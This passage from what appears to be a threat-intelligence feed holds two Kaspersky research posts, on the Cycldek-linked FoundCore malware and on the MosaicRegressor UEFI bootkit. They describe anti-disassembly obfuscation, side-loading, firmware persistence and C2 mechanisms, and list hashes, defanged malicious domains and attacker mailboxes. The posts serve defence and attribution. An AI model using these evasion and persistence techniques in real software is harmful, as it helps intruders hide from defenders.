the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous &quot;DLL side-loading triad&quot;: a legitimate executable, a malicious DLL to be [sideloaded](<https://attack.mitre.org/techniques/T1574/002/>) by it, and an encoded payload, generally dropped from a self-extracting archive. Initially considered to be the signature of LuckyMouse, we observed other groups starting to use similar &quot;triads&quot; such as HoneyMyte. While it implies that it is not possible to attribute attacks based on this technique alone, it also follows that efficient detection of such triads reveals more and more malicious activity.\n\nThe investigation described in this article started with one such file which caught our attention due to the various improvements it brought to this well-known infection vector.\n\n## FoundCore Loader\n\nThis malware sample was discovered in the context of an attack against a high-profile organization located in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06085101/Cycldek_01.jpg>)\n\nAfter being loaded by a legitimate component from Microsoft Outlook (FINDER.exe, MD5 [9F1D6B2D45F1173215439BCC4B00B6E3](<https://opentip.kaspersky.com/9F1D6B2D45F1173215439BCC4B00B6E3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)), outlib.dll (MD5 [F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)) hijacks the intended execution flow of the program to decode and run a shellcode placed in a binary file, rdmin.src (MD5 [DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)). Such shellcodes that we had seen so far, however, did not involve any form of obfuscation. So, it was a rather unpleasant surprise for us when we discovered the first instructions:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140032/Cycldek_02.png>)\n\nExperienced reverse-engineers will immediately recognize disassembler-desynchronizing constructs in the screenshot above. The conditional jumps placed at offsets 7 and 9 appear to land in the middle of an address (as evidenced by the label loc_B+1), which is highly atypical for well-behaved assembly code. Immediately after, we note the presence of a call instruction whose destination (highlighted in red) is identified as bogus by IDA Pro, and the code that follows doesn&#x27;t make any sense.\n\nExplaining what is going on requires taking a step back and providing a bit of background about how disassemblers work. At the risk of oversimplifying, flow-oriented disassemblers make a number of assumptions when processing files. One of them is that, when they encounter a conditional jump, they start disassembling the &quot;false&quot; branch first, and come back to the &quot;true&quot; branch later on. This process is better evidenced by looking at the opcodes corresponding to the code displayed above, again starting from offset 7:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140052/Cycldek_03.png>)\n\nIt is now more obvious that there are two ways to interpret the code above: the disassembler can either start from &quot;E8&quot;, or from &quot;81&quot; \u2013 by default, IDA will choose the latter: E8 is in fact the opcode for the call instruction. But astute readers will notice that &quot;JLE&quot; (jump if lower or equal) and &quot;JG&quot; (jump if greater) are opposite conditions: no matter what, one of those will always be true and as such the actual code, as seen by the CPU during the execution, will start with the byte &quot;81&quot;. Such constructs are called [opaque predicates](<https://en.wikipedia.org/wiki/Opaque_predicate>), and this E8 byte in the middle was only added there in order to trick the disassembler.\n\nDefeating this trick is but a trivial matter for IDA Pro, as it is possible to manually correct the disassembling mistake. However, it was immediately obvious that the shellcode had been processed by an automated obfuscation tool. Opaque predicates, sometimes in multiples, and dead code were inserted between every single instruction of the program. In the end, cleaning up the program automatically was the only practical approach, and we did so by modifying an [existing script](<https://github.com/RolfRolles/FinSpyVM/>) for the FinSpy malware family created by the respected reverse-engineer Rolf Rolles.\n\nThis step allowed us to discover the shellcode&#x27;s purpose: to decrypt and decompress the final payload, using a combination of RC4 and LZNT1. Even then, it turned out that the attackers had more tricks up their sleeve. Normally, at this stage, one would have expected to find a PE file that the shellcode would load into memory. But instead, this is what we got:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/01140315/Cycldek_04.png>) \nThe recovered file was indeed a PE, but it turned out that most of its headers had been scrubbed. In fact, even the scarce ones remaining contained incoherent values \u2013 for instance, here, a number of declared sections equal to 0xAD4D. Since it is the shellcode (and not the Windows loader) that prepares this file for execution, it doesn&#x27;t matter that some information, such as the magic numbers, is missing. As for the erroneous values, it turned out that the shellcode was fixing them on the fly using hardcoded operations:\n \n \n for ( i = 0; ; ++i ) // Iterate on the sections\n {\n // [...]\n // Stop when all sections have been read\n if ( i >= pe->pe_header_addr->FileHeader.NumberOfSections - 44361 )\n break;\n // [...]\n }\n\nFor instance, in the decompiled code above (as for all references to the file&#x27;s number of sections) the value read in the headers is subtracted by 44361. For the attackers, the advantage is two-fold. First, it makes acquiring the final payload statically a lot more difficult for potential reverse-engineers. Second, it also ensures that the various components of the toolchain remain tightly coupled to each other. If only a single one of them finds itself uploaded to a multi-scanner website, it will be unexploitable for defenders. This is a design philosophy that we had observed from the LuckyMouse APT in the past, and is manifest in other parts of this toolchain too, as we will see later on. Eventually, we were able to reconstruct the file&#x27;s headers and move on with our analysis \u2013 but we found this loader so interesting from an educational standpoint that we decided to base one track of our online reverse-engineering course on it. For more detailed steps on how we approached this sample, please have a look at [Targeted Malware Reverse Engineering](<https://xtraining.kaspersky.com/courses/targeted-malware-reverse-engineering>).\n\n## FoundCore payload\n\nThe final payload is a remote administration tool that provides full control over the victim machine to its operators. Upon execution, this malware starts 4 threads:\n\n * The first one establishes persistence by creating a service.\n * The second one sets inconspicuous information for the service by changing its &quot;Description&quot;, &quot;ImagePath&quot;, &quot;DisplayName&quot; fields (among others).\n * The third sets an empty DACL (corresponding to the SDDL string &quot;D:P&quot;) to the image associated to the current process in order to prevent access to the underlying malicious file.\n * Finally, a worker thread bootstraps execution and establishes connection with the C2 server. Depending on its configuration, it may also inject a copy of itself to another process.\n\nCommunications with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS. Commands supported by FoundCore include filesystem manipulation, process manipulation, screenshot captures and arbitrary command execution.\n\n## RoyalRoad documents, DropPhone and CoreLoader\n\nTaking a step back from the FoundCore malware family, we looked into the various victims we were able to identify to try to gather information about the infection process. In the vast majority of the incidents we discovered, it turned out that FoundCore executions were preceded by the opening of a malicious RTF documents downloaded from static.phongay[.]com. They all were generated using [RoyalRoad](<https://malpedia.caad.fkie.fraunhofer.de/details/win.8t_dropper>) and attempt to exploit CVE-2018-0802.\n\nInterestingly, while we would have expected them to contain decoy content, all of them were blank. We, therefore, hypothesize the existence of precursor documents, possibly delivered through spear-phishing, or precursor infections, which would trigger the download of one of these RTF files.\n\nSuccessful exploitation leads to the deployment of yet another malware that we named DropPhone:\n\n**MD5** | 6E36369BF89916ABA49ECA3AF59D38C6 \n---|--- \n**SHA1** | C477B50AE66E7228164930117A7D36C53713A5F2 \n**SHA256** | F50AE4B25B891E95B57BD4391AEB629437A43664034630D593EB9846CADC9266 \n**Creation time** | 2020-11-04 09:14:22 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 56 KB \n \nThis C++ implant also comes in the form of a legitimate executable (DeElevate.exe, from the publisher StarDock) and a side-loaded DLL (DeElevator.dll). At this stage, we are left with more questions than answers when it comes to it. DropPhone fetches a file saved as data.dat from hxxps://cloud.cutepaty[.]com, but we were unable to obtain a copy of this file so far. Next, it expects to find a companion program in %AppData%\\Microsoft\\Installers\\sdclt.exe, and will eventually terminate execution if it cannot find it.\n\nOur hypothesis is that this last file could be an instance or variant of CoreLoader (which we will describe in a minute), but the only piece of data supporting this theory that we have at our disposal is that we found CoreLoader in this folder in a single occurrence.\n\nDropPhone launches sdclt.exe, then collects environment information from the victim machine and sends it to DropBox. The last thing this implant does is delete data.dat without ever accessing its contents. We speculate that they are consumed by sdclt.exe, and that this is another way to lock together the execution of two components, frustrating the efforts of the reverse-engineers who are missing pieces of the puzzle \u2013 as is our case here.\n\n**MD5** | 1234A7AACAE14BDD94EEE6F44F7F4356 \n---|--- \n**SHA1** | 34977E351C9D0E9155C6E016669A4F085B462762 \n**SHA256** | 492D3B5BEB89C1ABF88FF866D200568E9CAD7BB299700AA29AB9004C32C7C805 \n**Creation time** | 2020-11-21 03:47:14 \n**File type** | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows \n**File size** | 66 KB \n \nFinally, CoreLoader, the last malware we found associated to this set of activity, is a simple shellcode loader which performs anti-analysis and loads additional code from a file named WsmRes.xsl. Again, this specific file eluded our attempts to catch it but we suspect it to be, one way or another, related to FoundCore (described in the previous section).\n\nOverall, our current understanding of this complex toolchain is as follows. Dashed lines represent the components and links we are inferring, striped boxes represent the files we could not acquire.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/04/06091732/Cycldek_06.jpg>)\n\n## Victimology and attribution\n\nWe observed this campaign between June 2020 and January 2021. According to our telemetry, dozens of organizations were affected. 80% of them are based in Vietnam and belong to the government or military sector, or are otherwise related to the health, diplomacy, education or political verticals. We also identified occasional targets in Central Asia and in Thailand.\n\nFor the reasons laid-out in the introduction, attribution based on tooling alone is risky when it comes to this nebula. At first glance, the use of a &quot;triad&quot;, the general design philosophy and the obvious effort spent to make reverse-engineering as complex as possible are reminiscent of LuckyMouse. However, we also observed code similarities between CoreLoader or FoundCore and programs associated with the Cycldek threat actor \u2013 namely, RedCore Loader (MD5: [1B6BCBB38921CAF347DF0A21955771A6](<https://opentip.kaspersky.com/1B6BCBB38921CAF347DF0A21955771A6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>)).\n\nWhile Cycldek was, so far, considered to be one of the lesser sophisticated threat actors from the Chinese-speaking nexus, its targeting is known to be consistent with what we observed in this campaign. Therefore, we are linking the activities described in this post with Cycldek with low confidence.\n\n## Conclusion\n\nNo matter which group orchestrated this campaign, it constitutes a significant step up in terms of sophistication. The toolchain presented here was willfully split into a series of interdependent components that function together as a whole. Single pieces are difficult \u2013 sometimes impossible \u2013 to analyze in isolation, because they rely on code or data provided at other stages of the infection chain. We regretfully admit that this strategy was partly successful in preventing us from obtaining a complete picture of this campaign. As such, this report is as much about the things we know as it is about figuring out what we don&#x27;t. We hereby extend our hand to fellow researchers who might be seeing other pieces of this vast puzzle, because we strongly believe that the challenges ahead of us can only be overcome through information sharing among trusted industry partners.\n\nSome readers from other regions of the world might dismiss this local activity as irrelevant to their interests. We would advise them to take heed. Experience shows that regional threat actors sometimes widen their area of activity as their operational capabilities increase, and that tactics or tools are vastly shared across distinct actors or intrusion-sets that target different regions. Today, we see a group focused on South-East Asia taking a major leap forward. Tomorrow, they may decide they&#x27;re ready to take on the whole world.\n\n## Indicators of Compromise\n\n**File Hashes**\n\n[F267B1D3B3E16BE366025B11176D2ECB](<https://opentip.kaspersky.com/F267B1D3B3E16BE366025B11176D2ECB/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore malicious DLL (outllib.dll) \n---|--- \n[DF46DA80909A6A641116CB90FA7B8258](<https://opentip.kaspersky.com/DF46DA80909A6A641116CB90FA7B8258/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore companion file (rdmin.src) \n[6E36369BF89916ABA49ECA3AF59D38C6](<https://opentip.kaspersky.com/6E36369BF89916ABA49ECA3AF59D38C6/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone \n[60095B281E32DAD2B58A10005128B1C3](<https://opentip.kaspersky.com/60095B281E32DAD2B58A10005128B1C3/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | Malicious RTF document \n[1234A7AACAE14BDD94EEE6F44F7F4356](<https://opentip.kaspersky.com/1234A7AACAE14BDD94EEE6F44F7F4356/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | CoreLoader \n \n**Domains**\n\n[phong.giaitrinuoc[.]com](<https://opentip.kaspersky.com/phong.giaitrinuoc.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | FoundCore C2 \n---|--- \n[cloud.cutepaty[.]com](<https://opentip.kaspersky.com/cloud.cutepaty.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | DropPhone C2 \n[static.phongay[.]com](<https://opentip.kaspersky.com/static.phongay.com/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) | RTF document stager", "cvss3": {}, "published": "2021-04-05T10:00:22", "type": "securelist", "title": "The leap of a Cycldek-related threat actor", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-0802"], "modified": "2021-04-05T10:00:22", "id": "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "href": "https://securelist.com/the-leap-of-a-cycldek-related-threat-actor/101243/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-07T09:55:20", "description": "\n\n[ Part II. Technical details (PDF)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/07080558/MosaicRegressor_Technical-details.pdf>)\n\nUEFI (or Unified Extensible Firmware Interface) has become a prominent technology that is embedded within designated chips on modern day computer systems. Replacing the legacy BIOS, it is typically used to facilitate the machine&#x27;s boot sequence and load the operating system, while using a feature-rich environment to do so. At the same time, it has become the target of threat actors to carry out exceptionally persistent attacks.\n\nOne such attack has become the subject of our research, where we found a compromised UEFI firmware image that contained a malicious implant. This implant served as means to deploy additional malware on the victim computers, one that we haven&#x27;t come across thus far. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.\n\nThroughout this blog we will elaborate on the following key findings:\n\n * We discovered rogue UEFI firmware images that were modified from their benign counterpart to incorporate several malicious modules;\n * The modules were used to drop malware on the victim machines. This malware was part of a wider malicious framework that we dubbed MosaicRegressor;\n * Components from that framework were discovered in a series of targeted attacks pointed towards diplomats and members of an NGO from Africa, Asia and Europe, all showing ties in their activity to North Korea;\n * Code artefacts in some of the framework&#x27;s components and overlaps in C&amp;C infrastructure used during the campaign suggest that a Chinese-speaking actor is behind these attacks, possibly having connections to groups using the Winnti backdoor;\n\nThe attack was found with the help of [Firmware Scanner](<https://www.kaspersky.com/enterprise-security/wiki-section/products/anti-rootkit-and-remediation-technology>), which has been integrated into Kaspersky products since the beginning of 2019. This technology was developed to specifically detect threats hiding in the ROM BIOS, including UEFI firmware images.\n\n## Current State of the Art\n\nBefore we dive deep into our findings, let us have a quick recap of what UEFI is and how it was leveraged for attacks thus far. In a nutshell, UEFI is a specification that constitutes the structure and operation of low-level platform firmware, so as to allow the operating system to interact with it at various stages of its activity.\n\nThis interaction happens most notably during the boot phase, where UEFI firmware facilitates the loading of the operating system itself. That said, it can also occur when the OS is already up and running, for example in order to update the firmware through a well-defined software interface.\n\nConsidering the above, UEFI firmware makes for a perfect mechanism of persistent malware storage. A sophisticated attacker can modify the firmware in order to have it deploy malicious code that will be run after the operating system is loaded. Moreover, since it is typically shipped within SPI flash storage that is soldered to the computer&#x27;s motherboard, such implanted malware will be resistant to OS reinstallation or replacement of the hard drive. \nThis type of attack has occurred in several instances in the past few years. A prominent example is the LowJax implant [discovered](<https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/>) by our friends at ESET in 2018, in which patched UEFI modules of the LoJack anti-theft software (also known as Computrace) were used to deploy a malicious user mode agent in a number of Sofacy \\ Fancy Bear victim machines. The dangers of Computrace itself [were described](<https://securelist.com/absolute-computrace-revisited/58278/>) by our colleagues from the Global Research and Analysis Team (GReAT) back in 2014.\n\nAnother example is source code of a UEFI bootkit named VectorEDK which was discovered in the Hacking Team leaks from 2015. This code consisted of a set of UEFI modules that could be incorporated into the platform firmware in order to have it deploy a backdoor to the system which will be run when the OS loads, or redeploy it if it was wiped. Despite the fact that VectorEDK&#x27;s code was made public and [can be found](<https://github.com/hackedteam/vector-edk>) in Github nowadays, we hadn&#x27;t witnessed actual evidence of it in the wild, before our latest finding.\n\n## Our Discovery\n\nDuring an investigation, we came across several suspicious UEFI firmware images. A deeper inspection revealed that they contained four components that had an unusual proximity in their assigned GUID values, those were two DXE drivers and two UEFI applications. After further analysis we were able to determine that they were based on the leaked source code of HackingTeam&#x27;s VectorEDK bootkit, with minor customizations.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141821/sl_MosaicRegressor_01.png>)\n\n**_Rogue components found within the compromised UEFI firmware_**\n\nThe goal of these added modules is to invoke a chain of events that would result in writing a malicious executable named &#x27;IntelUpdate.exe&#x27; to the victim&#x27;s Startup folder. Thus, when Windows is started the written malware would be invoked as well. Apart from that, the modules would ensure that if the malware file is removed from the disk, it will be rewritten. Since this logic is executed from the SPI flash, there is no way to avoid this process other than eliminating the malicious firmware.\n\nFollowing is an outline of the components that we revealed:\n\n * **SmmInterfaceBase**: a DXE driver that is based on Hacking Team&#x27;s &#x27;rkloader&#x27; component and intended to deploy further components of the bootkit for later execution. This is done by registering a callback that will be invoked upon an event of type EFI_EVENT_GROUP_READY_TO_BOOT. The event occurs at a point when control can be passed to the operating system&#x27;s bootloader, effectively allowing the callback to take effect before it. The callback will in turn load and invoke the &#x27;SmmAccessSub&#x27; component.\n * **Ntfs**: a driver written by Hacking Team that is used to detect and parse the NTFS file system in order to allow conducting file and directory operations on the disk.\n * **SmmReset**: a UEFI application intended to mark the firmware image as infected. This is done by setting the value of a variable named &#x27;fTA&#x27; to a hard-coded GUID. The application is based on a component from the original Vector-EDK code base that is named &#x27;ReSetfTA&#x27;.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01141941/sl_MosaicRegressor_02.png>)\n\n**_ __Setting of the fTA variable with a predefined GUID to mark the execution of the bootkit_**\n\n * **SmmAccessSub: **the main bootkit component that serves as a persistent dropper for a user-mode malware. It is executed by the callback registered during the execution of &#x27;SmmInterfaceBase&#x27;, and takes care of writing a binary embedded within it as a file named &#x27;IntelUpdate.exe&#x27; to the startup directory on disk. This allows the binary to execute when Windows is up and running. \nThis is the only proprietary component amongst the ones we inspected, which was mostly written from scratch and makes only slight use of code from a Vector-EDK application named &#x27;fsbg&#x27;. It conducts the following actions to drop the intended file to disk:\n\n * Bootstraps pointers for the SystemTable, BootServices and RuntimeServices global structures.\n * Tries to get a handle to the currently loaded image by invoking the HandleProtocol method with the EFI_LOADED_IMAGE_PROTOCOL_GUID argument.\n * If the handle to the current image is obtained, the module attempts to find the root drive in which Windows is installed by enumerating all drives and checking that the &#x27;\\Windows\\System32&#x27; directory exists on them. A global EFI_FILE_PROTOCOL object that corresponds to the drive will be created at this point and referenced to open any further directories or files in this drive.\n * If the root drive is found in the previous stage, the module looks for a marker file named &#x27;setupinf.log&#x27; under the Windows directory and proceeds only if it doesn&#x27;t exist. In the absence of this file, it is created.\n * If the creation of &#x27;setupinf.log&#x27; succeeds, the module goes on to check if the &#x27;Users&#x27; directory exists under the same drive.\n * If the &#x27;Users&#x27; directory exists, it writes the &#x27;IntelUpdate.exe&#x27; file (embedded in the UEFI application&#x27;s binary) under the &#x27;ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup&#x27; directory in the root drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142051/sl_MosaicRegressor_03.png>)\n\n**_Code from &#x27;SmmAccessSub&#x27; used to write the embedded &#x27;IntelUpdate.exe&#x27; binary to the Windows Startup directory_**\n\nUnfortunately, we were not able to determine the exact infection vector that allowed the attackers to overwrite the original UEFI firmware. Our detection logs show that the firmware itself was found to be malicious, but no suspicious events preceded it. Due to this, we can only speculate how the infection could have happened.\n\nOne option is through physical access to the victim&#x27;s machine. This could be partially based on Hacking Team&#x27;s leaked material, according to which the installation of firmware infected with VectorEDK requires booting the target machine from a USB key. Such a USB would contain a special update utility that can be generated with a designated builder provided by the company. We found a Q-flash update utility in our inspected firmware, which could have been used for such a purpose as well.\n\nFurthermore, the leaks reveal that the UEFI infection capability (which is referred to by Hacking Team as &#x27;persistent installation&#x27;) was tested on ASUS X550C laptops. These make use of UEFI firmware by AMI which is very similar to the one we inspected. For this reason we can assume that Hacking Team&#x27;s method of patching the firmware would work in our case as well.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142215/sl_MosaicRegressor_04.png>)\n\n**_Excerpt from a Hacking Team manual for deployment of infected UEFI firmware, also known as &#x27;persistent installation&#x27;_**\n\nOf course, we cannot exclude other possibilities whereby rogue firmware was pushed remotely, perhaps through a compromised update mechanism. Such a scenario would typically require exploiting vulnerabilities in the BIOS update authentication process. While this could be the case, we don&#x27;t have any evidence to support it.\n\n## The Bigger Picture: Enter MosaicRegressor Framework\n\nWhile Hacking Team&#x27;s original bootkit was used to write one of the company&#x27;s backdoors to disk, known as &#x27;Soldier&#x27;, &#x27;Scout&#x27; or &#x27;Elite&#x27;, the UEFI implant we investigated deployed a new piece of malware that we haven&#x27;t seen thus far. We decided to look for similar samples that share strings and implementation traits with the dropped binary. Consequently, the samples that we found suggested that the dropped malware was only one variant derived from a wider framework that we named MosaicRegressor.\n\nMosaicRegressor is a multi-stage and modular framework aimed at espionage and data gathering. It consists of downloaders, and occasionally multiple intermediate loaders, that are intended to fetch and execute payload on victim machines. The fact that the framework consists of multiple modules assists the attackers to conceal the wider framework from analysis, and deploy components to target machines only on demand. Indeed, we were able to obtain only a handful of payload components during our investigation.\n\nThe downloader components of MosaicRegressor are composed of common business logic, whereby the implants contact a C&amp;C, download further DLLs from it and then load and invoke specific export functions from them. The execution of the downloaded modules usually results in output that can be in turn issued back to the C&amp;C.\n\nHaving said that, the various downloaders we observed made use of different communication mechanisms when contacting their C&amp;Cs:\n\n * CURL library (HTTP/HTTPS)\n * BITS transfer interface\n * WinHTTP API\n * POP3S/SMTPS/IMAPS, payloads transferred in e-mail messages\n\nThe last variant in the list is distinct for its use of e-mail boxes to host the requested payload. The payload intended to run by this implant can also generate an output upon invocation, which can be later forwarded to a &#x27;feedback&#x27; mail address, where it will likely be collected by the attackers.\n\nThe mail boxes used for this purpose reside on the &#x27;mail.ru&#x27; domain, and are accessed using credentials that are hard-coded in the malware&#x27;s binary. To fetch the requested file from the target inbox, MailReg enters an infinite loop where it tries to connect to the &quot;pop.mail.ru&quot; server every 20 minutes, and makes use of the first pair of credentials that allow a successful connection. The e-mails used for login (without their passwords) and corresponding feedback mail are specified in the table below:\n\n**Login mail** | **Feedback mail** \n---|--- \nthtgoolnc@mail.ru | thgetmmun@mail.ru \nthbububugyhb85@mail.ru | thyhujubnmtt67@mail.ru \n \nThe downloaders can also be split in two distinct types, the &quot;plain&quot; one just fetching the payload, and the &quot;extended&quot; version that also collects system information:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142407/sl_MosaicRegressor_05.png>)\n\n**_Structure of the log file written by BitsRegEx, strings marked in red are the original fields that appear in that file_**\n\nWe were able to obtain only one variant of the subsequent stage, that installs in the autorun registry values and acts as another loader for the components that are supposed to be fetched by the initial downloader. These components are also just intermediate loaders for the next stage DLLs. Ultimately, there is no concrete business logic in the persistent components, as it is provided by the C&amp;C server in a form of DLL files, most of them temporary.\n\nWe have observed one such library, &quot;**load.rem**&quot;, that is a basic document stealer, fetching files from the &quot;Recent Documents&quot; directory and archiving them with a password, likely as a preliminary step before exfiltrating the result to the C&amp;C by another component.\n\nThe following figure describes the full flow and connection between the components that we know about. The colored elements are the components that we obtained and gray ones are the ones we didn&#x27;t:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142517/sl_MosaicRegressor_06.png>)\n\n**_Flow from BitsRegEx to execution of intermediate loaders and final payload_**\n\n \n\n## Who were the Targets?\n\nAccording to our telemetry, there were several dozen victims who received components from the MosaicRegressor framework between 2017 and 2019. These victims included diplomatic entities and NGOs in Africa, Asia and Europe. Only two of them were also infected with the UEFI bootkit in 2019, predating the deployment of the BitsReg component.\n\nBased on the affiliation of the discovered victims, we could determine that all had some connection to the DPRK, be it non-profit activity related to the country or actual presence within it. This common theme can be reinforced through one of the infection vectors used to deliver the malware to some of the victims, which was SFX archives pretending to be documents discussing various subjects related to North Korea. Those were bundled with both an actual document and MosaicRegressor variants, having both executed when the archive is opened. Examples for the lure documents can be seen below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142633/sl_MosaicRegressor_07.png>)\n\n_**Examples of lure documents bundled to malicious SFX archives sent to MosaicRegressor victims, discussing DPRK related topics**_\n\n \n\n## Who is behind the attack?\n\nWhen analyzing MosaicRegressor&#x27;s variants, we noticed several interesting artefacts that provided us with clues on the identity of the actor behind the framework. As far as we can tell, the attacks were conducted by a Chinese-speaking actor, who may have previously used the Winnti backdoor. We found the following evidence to support this:\n\n * We spotted many strings used in the system information log generated by the BitsRegEx variant that contain the character sequence &#x27;0xA3, 0xBA&#x27;. This is an invalid sequence for a UTF8 string and the LATIN1 encoding translates these symbols to a pound sign followed by a &quot;masculine ordinal indicator&quot; (&quot;\u00a3\u00ba&quot;). An attempt to iterate over all available iconv symbol tables, trying to convert the sequence to UTF-8, produces possible candidates that give a more meaningful interpretation. Given the context of the string preceding the symbol and line feed symbols following it, the best match is the &quot;FULL-WIDTH COLON&quot; Unicode character translated from either the Chinese or Korean code pages (i.e. CP936 and CP949).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142816/sl_MosaicRegressor_08.png>)\n\n_Figure_: The BitsRegEx system information log making use of the character sequence 0xA3, 0xBA, likely used to represent a full-width colon, according to code pages CP936 and CP949.\n\n * Another artefact that we found was a file resource found in CurlReg samples that contained a language identifier set to 2052 (&quot;zh-CN&quot;)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142900/sl_MosaicRegressor_09.png>)\n\n**_Chinese language artefact in the resource section of a CurlReg sample_**\n\n * We detected an OLE2 object taken out of a document armed with the CVE-2018-0802 vulnerability, which was produced by the so-called &#x27;Royal Road&#x27; / &#x27;8.t&#x27; document builder and used to drop a CurlReg variant. To the best of our knowledge, this builder is commonly used by Chinese-speaking threat actors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/10/01142954/sl_MosaicRegressor_10.png>)\n\n**_Excerpt from the OLE2 object found within a &#x27;Royal Road&#x27; weaponized document, delivering the CurlReg variant_**\n\n * A C&amp;C address (103.82.52[.]18) which was found in one of MosaicRegressor&#x27;s variants (MD5:3B58E122D9E17121416B146DAAB4DB9D) was observed in use by the &#x27;Winnti umbrella and linked groups&#x27;, according to a publicly available [report](<https://401trg.com/burning-umbrella/>). Since this is the only link between our findings and any of the groups using the Winnti backdoor, we estimate with low confidence that it is indeed responsible for the attacks.\n\n## Conclusion\n\nThe attacks described in this blog post demonstrate the length an actor can go in order to gain the highest level of persistence on a victim machine. It is highly uncommon to see compromised UEFI firmware in the wild, usually due to the low visibility into attacks on firmware, the advanced measures required to deploy it on a target&#x27;s SPI flash chip, and the high stakes of burning sensitive toolset or assets when doing so.\n\nWith this in mind, we see that UEFI continues to be a point of interest to APT actors, while at large being overlooked by security vendors. The combination of our technology and understanding of the current and past campaigns leveraging infected firmware, helps us monitor and report on future attacks against such targets.\n\nThe full details of this research, as well as future updates on the underlying threat actor, are available to customers of the APT reporting service through our Threat Intelligence Portal.\n\n## IoCs\n\nThe followings IoC list is not complete. If you want more information about the APT discussed here, a full IoC list and YARA rules are available to customers of Kaspersky Threat Intelligence Reports. Contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n**UEFI Modules **\n\nF5B320F7E87CC6F9D02E28350BB87DE6 (SmmInterfaceBase) \n0C136186858FD36080A7066657DE81F5 (SmmAccessSub) \n91A473D3711C28C3C563284DFAFE926B (SmmReset) \nDD8D3718197A10097CD72A94ED223238 (Ntfs)\n\n**RAR SFX droppers**\n\n0EFB785C75C3030C438698C77F6E960E \n12B5FED367DB92475B071B6D622E44CD \n3B3BC0A2772641D2FC2E7CBC6DDA33EC \n3B58E122D9E17121416B146DAAB4DB9D \n70DEF87D180616406E010051ED773749 \n7908B9935479081A6E0F681CCEF2FDD9 \nAE66ED2276336668E793B167B6950040 \nB23E1FE87AE049F46180091D643C0201 \nCFB072D1B50425FF162F02846ED263F9\n\n**Decoy documents**\n\n0D386EBBA1CCF1758A19FB0B25451AFE \n233B300A58D5236C355AFD373DABC48B \n449BE89F939F5F909734C0E74A0B9751 \n67CF741E627986E97293A8F38DE492A7 \n6E949601EBDD5D50707C0AF7D3F3C7A5 \n92F6C00DA977110200B5A3359F5E1462 \nA69205984849744C39CFB421D8E97B1F \nD197648A3FB0D8FF6318DB922552E49E\n\n**BitsReg**\n\nB53880397D331C6FE3493A9EF81CD76E \nAFC09DEB7B205EADAE4268F954444984 (64-bit)\n\n**BitsRegEx**\n\nDC14EE862DDA3BCC0D2445FDCB3EE5AE \n88750B4A3C5E80FD82CF0DD534903FC0 \nC63D3C25ABD49EE131004E6401AF856C \nD273CD2B96E78DEF437D9C1E37155E00 \n72C514C0B96E3A31F6F1A85D8F28403C\n\n**CurlReg**\n\n9E182D30B070BB14A8922CFF4837B94D \n61B4E0B1F14D93D7B176981964388291 \n3D2835C35BA789BD86620F98CBFBF08B\n\n**CurlRegEx**\n\n328AD6468F6EDB80B3ABF97AC39A0721 \n7B213A6CE7AB30A62E84D81D455B4DEA\n\n**MailReg**\n\nE2F4914E38BB632E975CFF14C39D8DCD\n\n**WinHTTP Based Downloaders**\n\n08ECD8068617C86D7E3A3E810B106DCE \n1732357D3A0081A87D56EE1AE8B4D205 \n74DB88B890054259D2F16FF22C79144D \n7C3C4C4E7273C10DBBAB628F6B2336D8\n\n**BitsReg Payload (FileA.z)**\n\n89527F932188BD73572E2974F4344D46\n\n**2nd Stage Loaders**\n\n36B51D2C0D8F48A7DC834F4B9E477238 (mapisp.dll) \n1C5377A54CBAA1B86279F63EE226B1DF (cryptui.sep) \n9F13636D5861066835ED5A79819AAC28 